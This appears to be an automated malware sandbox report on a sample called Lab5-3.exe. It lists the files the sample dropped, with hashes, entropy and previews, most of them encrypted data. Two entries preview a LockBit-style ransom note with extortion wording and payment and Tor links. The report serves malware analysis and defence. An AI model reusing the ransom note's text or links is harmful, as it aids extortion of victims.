                                                                                                          Preview:..d...H...:...s&...&PH..O....e.L..2.K..^...+...V....[AjV.x"@V._.....>Z....sAEv.F.........>.".`...k.q..9..\..+..S...>.....#2....h....O..w...~O..{ ..,.Z.U.V..$1l....S.k.|/./.,.8..(......_lkT.0(.....f...;.e....b4.,..#..q...%a...`...<\?.....` .a.z$..m..6.F..@.7.?.8..z.p.e}.$..Y...j.z....::....R..DF.h/]..^.`-.|..|..z(.)..'..]..$f.....6t...Hl.o...Z..G.~b....zv[;7.:|...u.V..v...%..vd;H.L.GKC.tex.u....}N...MZc..Pc.....q..AtV>............M[.H.F.R.cu.^...../.....d...5......|&fn.^..........Fw........]J.....e.WE/Uv....+........=.g.8.i.].k\.!..y..)../.......).<.E...W...?r.#.9BX..{.I'..........i...*...N.f4/..^pOo./..!.j..H..L....F..........6.Wa....}......"..:..]..}mA(..6...5.......4...4M.e.}\......hD......6......./~Lc.u.%.sG...P.l$.i..Dj..+1\M.vR.-..6...Ww.R.fo.&.a.-/....1..#..rzE:~.r*A..*ws..0cL"P...j.p.9.x:....q.A#f..|M`..kJ.*4.[.E....ng0}n...,.d...H.-...K3...R ....-w...>..3<.~.9j...Z#..>...5...v....C.o..J..qO..=.g..7...!.~..@.q......&. ...h^...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):263696
                                                                                                          Entropy (8bit):7.999346349960074
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:V6ewDa7ffY7R6YQHOBic40sYCaobyUa4r9NHjxUhHjlmx/5v2WoH/5Z:V9ftYQ8hCaoWtsDKBmx12h
                                                                                                          MD5:9BB3D9949E2780A3412BF674F63A7728
                                                                                                          SHA1:A7753046064A2BDB6073812B9566409E285AD185
                                                                                                          SHA-256:E5D6970750402BBC0F1261F25106E3FC670AB32148534DB02F12845001A61639
                                                                                                          SHA-512:2E14A6535C57146897AFB7D15997E4F7785493BDA3B18F2D52611197D3A1418BB207641542BDE26E8F32D2E1D9B9704C96C4A44ABD5085E4FDAF76FE8B6E7768
                                                                                                          Malicious:true
                                                                                                          Preview:Xis.r......r.o.p.X.....U;.]~.B....Q.T.......i..S.'jB4%.a&.......<..8...Cv.1.&.mC.+.W.w.....@..1...=...y..mD"g...9e\.>.....H..._..,Aw4..79..<....t.5c..)..Q>x..<.rB..g..V..1..s..p.&R...^OjsMH...?.........83.+/.E.a?.S.t..#U.upejL...y..z...;.x..O....LN.J..._.v0$.f...h....nK:..zM.G$..{..[+/.."$..RNc..I.........[../...K&....."....J.....*z.h..K..Mol.E........oBr,IZ.':FJ;.~(..H.m9.e..4o...C..s~jF..s..S.p.....Vw.9....].$.'..^.L..P......w..s.O,B..DE.g....o.`{...r..v.....P...e..f....A`.....C..<~..{/...pt..... q.f<_?|..pa..G.v...,nZ..J.....L.....b\[k..j{.=..F.BQ8........*`+0b.1S.f.G../.._..2.........m....(.M.......r.[e.>.t..&..[.l@..,G..s.Y<]...9.8.I6...i$.d....$...f...U....C...f...#..w..H.:1.<?&...W9....o..m..B...`i.... {)|.:TO..%..]..+..^h..X .w9.Gi,........D....uF.S...9+?.U;..#.<D...\.:...9.9KQ.,..i?n...O....p-.Pb.']h.....{.......<W.].0....~~..b}....=........(.=.p..w....+....'d....S..Q.y"....i8.ywP...J]...R...u.6w.V?.s.j..0fg.o.?8v..K..!.{..A...Lts
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2560
                                                                                                          Entropy (8bit):7.936147221626143
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ThhSKS4K7RJ2Hr54IlWoor36IN1zHfUTid3hBaUoSGFcmeykEdEElU92i:ThhSv4dr5/WR6xGx0uKeY2ElUJ
                                                                                                          MD5:046B592125F180ECE9421C8BC45C436F
                                                                                                          SHA1:44E5FBFDE30BCA2C32DE664AECCB0B68067C5465
                                                                                                          SHA-256:744F22987F0FD47C96E85991C2820B04EB072EE0F96D4D24E923EF437DF5D49C
                                                                                                          SHA-512:19A2F6FBA5047898C0A667DEBEB072EB18593F9ED0DFB2CDDDED8CC2CC6101744269A0862F670712A28AE4FED7EAE8FF5491415B5F0D6EFA432CD034AC6E2E01
                                                                                                          Malicious:false
                                                                                                          Preview:....U.}...n.H..f./.|?.#}..X..<...Bdc.........|.)^.......B.,O+.."..].g....\.H...KY...i..+....V.?4.D.?.9[.Wn...|.D.F. ..$*~.-y.}.X.......`.y...&...j.*..<..yS\..h..{.(.I.W..|.v.s......+.r.......8|..z......Ct.$r<......G##.%.........x...#...K.g...G..W...v.^.....oh.z......Q............Rb.@..C....AR..__..........._.2..>.>D.t.Q8.@...aF..........>..I@~1+2P...6.MSZP..d.(;C..e4r.T:._z.@.m.Y..y1%.q....].g.....X...q1.J>.../....:......}....'.A.....R.aW....P..5.......G.I5,g.....}(.2.T>._..$.)...\E...1.\`9%......)..q..Z.............Nh...\.y...Z......N..=.........uL..)..!@x.....X.....V.sLG.!..,.9...&........^.&.u.....G...@../..5%.. .1....DU.<.:.e.+....[m.Z......N.....U.9.&..3.V.<........_1...Zcu2.?.a...[..X.P.......3...kaD.x..;....q.XU...].2.W..8..=.@.Z.m5.go.Jq..N..~`..}.Zap2_c......vG...:g./..N*C..e.8.?..(.....F.FE..nqI[.{.B5..r?R..Ov..o.-.@.Pz..*.wGb.X..&P..........`..m=.#..0o....dk*LP..9"..}...x(.lR.$..;HZB.{%#.8g$.,.q8....Cvr..S...|.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1776
                                                                                                          Entropy (8bit):7.897851746750748
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:wAXiedb3llkejHfUTid3hBaUoSGFcmeykEdEElU92i:wEieh3lgGx0uKeY2ElUJ
                                                                                                          MD5:A816ED1E5CDE3D9BE9C15F207E1D787E
                                                                                                          SHA1:203BC8110BB37D5222F7CC85CE82A094AB6AFE59
                                                                                                          SHA-256:C10D52E104A330EDEA1E5B74EB792ADF62BEE6F3D77475D950382663595BD662
                                                                                                          SHA-512:0B8E3ACA7359929BBBFBB07F2082DF8F1123A1900A87DEA7846121D39610805C6BA0184A613791B5914AF69F3954ED787CCADE1D5ED56F2560FAA028BA9089FE
                                                                                                          Malicious:false
                                                                                                          Preview:_s....2.A'_>....K....wJ.R.R.X.u.,.C.O...+...EX..j.v&8...h...a..Cg.Y....Z.......2...8t7q.qT.#.Y......s...v.\._4[..5<../rw...Y..&.&.(N.>......C.)L.V.6w.J..O.s@5(.........|..0P..|...P..ME..r...#.......qn..9.O..z.P...%.E!....}.G..}...sV...&.+......D..}...oq....*T}..D0.4."..?.P@.5s.4..YSl.9J'V.L....\..A..ab.....;...LPI......*i..... .....Ya...$..+d,%.,.<.^.fD.\K.,.\.~..!.a.....w.P........._...'...P!!.?.5..`.........."..c.z..r.?.......W.....ip,.3..Z..[^.;..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.n
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:DOS executable (COM)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1744
                                                                                                          Entropy (8bit):7.894349637000168
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:7QAzzy0wjHfUTid3hBaUoSGFcmeykEdEElU92i:7DowGx0uKeY2ElUJ
                                                                                                          MD5:9BFDB01D6947FF551B2C7B59B76DC9B9
                                                                                                          SHA1:E39B0BAED5659B2F9FE62275DE18FD3D4ECD44E5
                                                                                                          SHA-256:C93493CA1F0B5602F1B696D3A871DF8ABE4F1A2E4573730E69C629B44FB6C2A4
                                                                                                          SHA-512:91F5367A9C9C7C2BA1AA6C5959F8A0D969BCEB852376A51EF24E97618DEDD9941B0BF8F1B82DFAF93458A49062F0B7987A0B266DEA26F4E13CE8807FA36D1952
                                                                                                          Malicious:false
                                                                                                          Preview:.L`..a....$..g.v.=lRW....pg~..;.....0...<0".!..^ .Iq..\.#.. vI....6..!E....p.=.......).m9.7v:.....Z.7.M.@$.AZ)..s.....D.q...<...K.?.Bt.p...%.....m.....5 ....T..~..b..tp..|<H.Y..;...)....0...K.BF....a..H<....u}...[.M)_........^.aJ..!M.c...c.e......dr4.l....Ea.T.....o@.6......ob.1...Z..2).........;./._...n....#M3..A.!...j}...*.z...].@..U....J.>'3(..I.0....YD.....iK..<..l.}\q..o....~.I....)M.......*.)8...X......`.... &tQ.<..6..V.-..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1808
                                                                                                          Entropy (8bit):7.8863379709252674
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:VcuOKy2uEjsMtHUHfUTid3hBaUoSGFcmeykEdEElU92i:VcN92CMtHTGx0uKeY2ElUJ
                                                                                                          MD5:AE359F01E444B98BEEF68F4D38457253
                                                                                                          SHA1:B0E3FDF2253667FCD99372559823555DDFFC9C57
                                                                                                          SHA-256:F2D4B61D6D6993E44BABF170E697EBECB35DE1DBB67E3220895731DB85861224
                                                                                                          SHA-512:81DB6B709F2D57E7A3FFA81A7D1A78A156F7801BA52B39EC9922CA77FFF1D089613310F57EBA97F69D4856D76E953DE7E5DB1B265CFBB00C84D27A6D1076A594
                                                                                                          Malicious:false
                                                                                                          Preview:....yp2.,.b..iy..P..ef.,4.}..{.e[..ujXH...&..l<....U.VI.I. .S....&V.{.G....vRG['.?..r....s...#.D..[..?.@.F.q..1i.1lS}$..P....Zl..Hao...G.M{.S..b..taO4.G...#..O..!.0.o..R.....;...*j.....x}.L............9lJq.....V.^%..OU..Q.H..v...S...t.P...........f$.2.'3....O...FQ.......t..}.Sum/.o..f.c4....o..V..R*_...4...!.R.:.**|..Ff.Mw...@.`.M...vK8.u........7.{....../>..G.%U...._./..Y.Guq"e^.2].:..P....m.D(.}.........Y..Q..R...2v.9~.l.1-.H.5.B.......k.*0......9.h^....R.M..N...x.t........-...\...bO...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1776
                                                                                                          Entropy (8bit):7.899526468965131
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:1Lb6GXeUXPCwJfg4HfUTid3hBaUoSGFcmeykEdEElU92i:1LDX3p9gfGx0uKeY2ElUJ
                                                                                                          MD5:C8141BDD613A90B4569BD3F92762832D
                                                                                                          SHA1:784C00DCA6A1310D7559F7B89B64106BE5EB091C
                                                                                                          SHA-256:108FB60D13AD484A04045B4ED9C3665DFD9647315C01D99FDF0C95B2F7486810
                                                                                                          SHA-512:4166C98D5D405E7BDA33A0844A0639405D76D966F5702A6F2913962D0268B04B68DFA3AA5AC2454D5FF938172EB38865F3AB22855A9DE78E1DFEAEE7559B1ACB
                                                                                                          Malicious:false
                                                                                                          Preview:.k........$.=..k.NTjN.e.`r&."..3i>.W.M..A....(.QI#\...H....e..*..#.............._3.;*Z.|T.l.....$...w.!OV....e.;...+.....E^..q..5 =..=f..J.L@...XSn~..........hF..a..+..1s.@.e5F.Bz.q.........W...7..h..&..m.[...jH.$.d..0..\)....N../.e.I-...yu.......DD.....J..&...d..8G.....D..&....^.m{...Kc.E+8...<`..C...b.v.....^J.....b..H.3y..$o0U..k..".....3......^@..(Q....}h.....+m....,.E.............+v.wGeX.K..a@..Y.J..f]..h%.,B..j>-.u."s'..B........5+:.8.fCi%.f....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.n
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1776
                                                                                                          Entropy (8bit):7.895221768289147
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:g5fVfkOHfUTid3hBaUoSGFcmeykEdEElU92i:CkhGx0uKeY2ElUJ
                                                                                                          MD5:61456060A17A6F99A0B56B3A0BD8219D
                                                                                                          SHA1:97EDBE931C073234BC942B0A6F39803B1FAC0558
                                                                                                          SHA-256:9585F7391E94648668770DD876BBF34580BA10D76DEC7266C8EB87476C10957F
                                                                                                          SHA-512:91F1C3F0258FD2B90B0C038FF5A57927F9F32C181F7644966DE26CB25925D479835F26D17F54DA5DD4EFF0B654B17F64B9481E2175240B5C4B8EBBF8F4AF0BA3
                                                                                                          Malicious:false
                                                                                                          Preview:..(.......Q..'.V..3.%7.060%C.2.Ju4_........ol6'....x.Gsf..^..DG.|...t.*?Z..R .....w...u.Z.%b..9.1.?.bAw..,.'&.g......K.J...k.Gq......a....2lw.....i.&.Y&T...{.@z.I.afQ..y.4J......i..J8.n.V~..E..5...wr.c....Q.}...Q.!.....-..t..4.sJ"Q...D..u.*BX|..:".<.P:T@........1.5......}.....,id.z..5.B%......~..w.....DB.2...>O...\o.....D....0+.y..Q..%....:.?..W.B......<...i.J...m....g.x...._....!.;.C.\.=m.~ T.7........Jp........~..Mk`../....I.L..U.......j......mI..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.n
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1744
                                                                                                          Entropy (8bit):7.886271971081214
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:cX0EXm4BpHfUTid3hBaUoSGFcmeykEdEElU92i:cXlXm44Gx0uKeY2ElUJ
                                                                                                          MD5:36BF2F94DC059D511C9D9FEF99DC58AA
                                                                                                          SHA1:2C6D5F12685414538E80B8050BF231B4CE720A6D
                                                                                                          SHA-256:4E3251E90F1BD88122B56B723DFDD4287FC0B907D2EF6A80033B3FDCC6AE5204
                                                                                                          SHA-512:68EFD6946F17A467B2112C3EFB406BABF49F219504D1288AA0451DB99F1D0D4681E1DD2DC25858C2D75E39C32F9285D078C17D2603124D26FE79A7E86B4D5A1D
                                                                                                          Malicious:false
                                                                                                          Preview:.-..V.~..+no....En....^.=.e..w..=.j.............D.C,cNg.1.x,.Z..C..@.......ECr ...y....8.mC...o......~.;.t......Am....w....?.OL...o.\JW..O..N........%.W.........+/./..pb.C..7{)...#..xV.*...Hz)...(/(....u.mZ.........=...}.0.w.A..uT...........3....2.O.L.....v.$.o..2.1...;.Q.......l4.......<..(..q.(H.....%>.s..W..D.R~.g.@+.C..0#...........Q.7.Pe!.z...e...:....m...........pb.+..FJ...76.s..)R..MK?.jg;H..*....6..e...J.~T.(U..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1744
                                                                                                          Entropy (8bit):7.898245861952497
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:l+pIhIog3jHfUTid3hBaUoSGFcmeykEdEElU92i:OIhZ/Gx0uKeY2ElUJ
                                                                                                          MD5:B4BFFC6E27E8EB818CC27296183D1AFD
                                                                                                          SHA1:0F2C2AF38A9AE305BDA00B8877F72C69001925B0
                                                                                                          SHA-256:1ED0BAEAB37B4CBFBAFF6B6B9B3EAEA0350BBE683BC4A5129B324C1D2141F240
                                                                                                          SHA-512:72263C0AAEC9CB3EC5291844260C4F9EC7FD43D7FE0C487F296D9DB4B7F31FCACA0AC4334BCB60575555F24B5EE9EB29C95D0D1B6C9E1D96EA4701BD5ACED4B3
                                                                                                          Malicious:false
                                                                                                          Preview:.!.Z..&....n~a....D....K.v.8.........4S.I.....2.=l.B.9."\.C9.D/..7.#;.Y......CI....2..k.3x..)....k.,.^..u..n.>../......,..f.Pe........./....9..h7.. .W...(......X.....U.u....|.y.....8...%.H...O.j....U4..5.1f=...h......+..L)...{....k%_.....p|.u.`H>...om... ..@.....l..A..3...Y. 50.Y..&L...v....S..U[:C.].1.X.*.....:.......yG.+S.....0@i..D.G.l....#)}...,"...._u8.7..4c....:2.?90f..3_....=..b.:+^*.u.....FU..K.Im.1...T\.....%X.k.K....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1776
                                                                                                          Entropy (8bit):7.890747174053127
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:excEChdscZbmuHfUTid3hBaUoSGFcmeykEdEElU92i:xhdsPGx0uKeY2ElUJ
                                                                                                          MD5:CD0DD4272E0FAEE2E895C41719464375
                                                                                                          SHA1:2BB86C5BE78F8B5FFBAADD4F2051FD889AEB9EF8
                                                                                                          SHA-256:39E47D4B4E4BCAFBAD5F229016373AC6F2DE45874CDA796E7E3988E18741FDF3
                                                                                                          SHA-512:76202E97745738CB6DCB8E6C26D206DE1756A2B7E305403243CA604E39A1A87D36633FB2612362C677EBB0311173A4A0AD2ACD6BBD1985986B87BF3CD71FADED
                                                                                                          Malicious:false
                                                                                                          Preview:*.m.\..#.H......./,U...,c,:eT".u9..b_......a.r. ./..u.G.L.g......L..l........y..]OI..${64m..K=.I.F376..a..rD.o+.......jOTP..).[..;.q...T.A.&./.JJ......~.[.|.y.j.0.h..l.9^....(.P..8......Fc.Xd........7li[..AW+.X.\<...e..=...O..R%.?..plh%...|...EV....||np.)..... !2.q..kQ..k..z.2d.A.s.G..p'Q...5?.....[~..F..1...d.!...ER.SS....d..~......(p..>.J.P.......x1.d.....'...o.Igxk..n.A*.X......."...;..W=...d/p#.G.k......[Vm&N+.._B.. .z.G..F.U....8...em..vA...Q..iK....4.G..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.n
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1744
                                                                                                          Entropy (8bit):7.8846180626844244
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:LX1QLG4NQeHfUTid3hBaUoSGFcmeykEdEElU92i:LB4QxGx0uKeY2ElUJ
                                                                                                          MD5:6A144B29D012F55D0C6282429C40645E
                                                                                                          SHA1:505946D676E7642FCE703AA380226869621F3893
                                                                                                          SHA-256:5051883869F6857CB9FB60A8004C5DD375FF92FB13287252848DB64CD9A0A942
                                                                                                          SHA-512:22C90483EF5CA0F8EC5F47C7CDB23F058A2CEBF662F1DE7E4EBB4CD05D28AF60626E291E7A295560C13EBA32D59169D409E1D4B1AB3D9D349DA49524375D5497
                                                                                                          Malicious:false
                                                                                                          Preview:J.'...u..4...}h..V...@.......G....vb.<m_.mO....B..KEK..E..%.(.g..=..cov9H.Q....(O...ch......N..X........[.W.i.....j.O.0...=....lr./...x).f(Q.X;e...7x_.q.?b..s...=.?,#tl%.....{....b$./&.G..og..;n,...b.`X..yr".L.,8..D.}../.BX....T...L.......eR.{5.k..X...C./..;....sd2..2.[..0.@\TD~9R|O&.........*.<.N.c{..)....$..9..cr~w...=..D..LW.Y.h.@X....^.pR...^..B.}.).<.~.../.qtr.....q.P./D.H.X..Z....3.r......z.b.$p>".!w=g{..<|.n.......5....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1808
                                                                                                          Entropy (8bit):7.88887407230761
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:TKmABRdAdZaHfUTid3hBaUoSGFcmeykEdEElU92i:TxA/dAz1Gx0uKeY2ElUJ
                                                                                                          MD5:9E749C4C9706930D49C4CA83E297CCD6
                                                                                                          SHA1:6D28D6236D1AFB73E63D7980DEBEB9B64AECEB88
                                                                                                          SHA-256:DFC263FA10023EC610405C91120A90ABAD2610BFA6F62322847D4C3FB6126A59
                                                                                                          SHA-512:CB48F1894FEAF8EBAD24BDFC3DD034BD913390741B815D5C701D175B6143DD0E8275EB0E0E3F320C2EECB60F36BBC9E4BE0FF5C201253A1558727189D6DFBD05
                                                                                                          Malicious:false
